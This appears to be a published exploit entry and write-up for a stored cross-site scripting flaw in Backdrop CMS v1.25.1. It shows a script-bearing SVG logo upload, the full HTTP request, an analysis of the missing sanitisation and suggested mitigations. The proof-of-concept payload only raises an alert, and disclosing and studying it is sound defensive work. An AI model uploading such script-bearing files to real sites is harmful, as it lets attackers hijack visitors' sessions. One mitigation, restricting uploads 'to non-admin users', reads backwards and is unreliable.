Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)

Exploit Author: Mirabbas Ağalarov Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-19

#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
#Application: Backdrop Cms
#Version: v1.25.1
#Bugs:  Stored Xss
#Technology: PHP
#Vendor URL: https://backdropcms.org/
#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

2. Technical Details & POC
========================================

1. login to account
2. go to http://localhost/backdrop/?q=admin/config/system/site-information
3. upload svg file

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""
4. go to svg file (http://localhost/backdrop/files/malas_2.svg)


Request

POST /backdrop/?q=admin/config/system/site-information HTTP/1.1
Host: localhost
Content-Length: 2116
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/backdrop/?q=admin/config/system/site-information
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E
Connection: close

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_name"

My Backdrop Site
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_slogan"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_mail"

admin@admin.com
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_logo_path"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_favicon_path"

core/misc/favicon.ico
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_frontpage"

home
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_403"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_404"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_build_id"

form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_token"

siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_id"

system_site_information_settings
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="op"

Save configuration
------WebKitForm

Backdrop CMS v1.25.1: Stored Cross-Site Scripting (XSS) Vulnerability Explained

Backdrop CMS, a lightweight fork of Drupal designed for simplicity and ease of use, has recently been flagged for a critical security flaw in version v1.25.1. This vulnerability, identified as a stored Cross-Site Scripting (XSS), allows attackers to inject malicious JavaScript code into the system through a seemingly innocuous file upload process. The exploit is particularly dangerous because the payload is persistently stored and executed whenever the affected resource is rendered.

Understanding Stored XSS

Stored XSS occurs when malicious scripts are permanently saved on a server and later executed in the context of a user’s browser. Unlike reflected XSS, which requires a user to click a malicious link, stored XSS can trigger automatically—making it far more dangerous in real-world scenarios.

For example, if a website allows users to upload a logo image and fails to sanitize the file content, an attacker could embed a script within an SVG file. When the logo is displayed, the browser executes the script, potentially stealing cookies, redirecting users, or compromising session integrity.

Exploit Details: SVG File Upload Abuse

The vulnerability in Backdrop CMS v1.25.1 stems from improper handling of SVG (Scalable Vector Graphics) file uploads within the Site Information configuration page. Specifically, the admin/config/system/site-information endpoint accepts file uploads without validating or sanitizing the content.

Attackers can exploit this by uploading a malicious SVG file containing embedded JavaScript. The following example demonstrates the payload:






 
 
      alert(document.location);

Explanation: This SVG file includes a harmless visual element—a green triangle—but also contains a <script> tag that executes alert(document.location) when rendered. This script runs in the browser context, revealing the current URL to the attacker.

While the alert is harmless in this proof-of-concept (POC), in real attacks, the script could:

Steal session cookies via document.cookie
Redirect users to phishing sites
Inject malicious content into the DOM
Perform cross-origin requests to internal APIs

Attack Vector: Administrative Interface

The exploit requires authentication, meaning only users with administrative privileges can upload files to the site_logo_upload field. This limits the attack surface but still poses significant risk:

Compromised admin accounts
Insider threats
Weak password policies
Phishing or credential theft

Once an attacker gains access to the admin panel, they can upload the malicious SVG and trigger execution simply by visiting the site logo URL, such as:


http://localhost/backdrop/files/malas_2.svg

Any user visiting this URL—especially administrators or content editors—will have the script executed in their browser.

Technical Analysis of the Request

The HTTP request used in the exploit demonstrates how the malicious SVG file is transmitted:

Field	Value
`Content-Disposition`	`form-data; name="files[site_logo_upload]"; filename="malas.svg"`
`Content-Type`	`image/svg+xml`
`Content`	`Malicious SVG code`

Despite the Content-Type being image/svg+xml, the server does not perform content validation or sanitize the file before storing it. This failure allows the script to be preserved and rendered as HTML.

Root Cause: Lack of Input Sanitization

Backdrop CMS, while designed for simplicity, lacks robust security checks when handling file uploads. The core issue is that:

SVG files are treated as images, not as potentially executable content
Script tags within SVG are not filtered or removed
No validation or sandboxing of file contents occurs during upload

Although SVG files are inherently designed for vector graphics, they support scripting via <script> elements. This capability is often overlooked in security assessments, leading to vulnerabilities like this one.

Security Recommendations

For developers and administrators, the following mitigation strategies are essential:

Validate file types and content: Implement MIME type checks and scan file contents for scripting elements.
Sanitize SVG files: Strip <script> tags and prevent execution of embedded code.
Use sandboxed rendering: Serve SVG files through a content security policy (CSP) that disables script execution.
Limit upload permissions: Restrict file uploads to non-admin users and enforce role-based access control.
Update to patched versions: Immediately upgrade from v1.25.1 to the latest secure release.

Conclusion: A Wake-Up Call for CMS Security

Backdrop CMS v1.25.1’s stored XSS vulnerability underscores a critical truth: even simple, lightweight systems are not immune to serious security flaws. The attack demonstrates how a small oversight—failing to sanitize SVG file content—can lead to widespread exploitation.

Security is not about complexity; it’s about diligence. Every file upload, every form input, every rendered resource must be treated as a potential attack vector. Developers must assume that any user input can be malicious and apply defense-in-depth principles.

For organizations using Backdrop CMS, this vulnerability is a red flag. Immediate patching, thorough auditing, and ongoing security training are essential to prevent exploitation.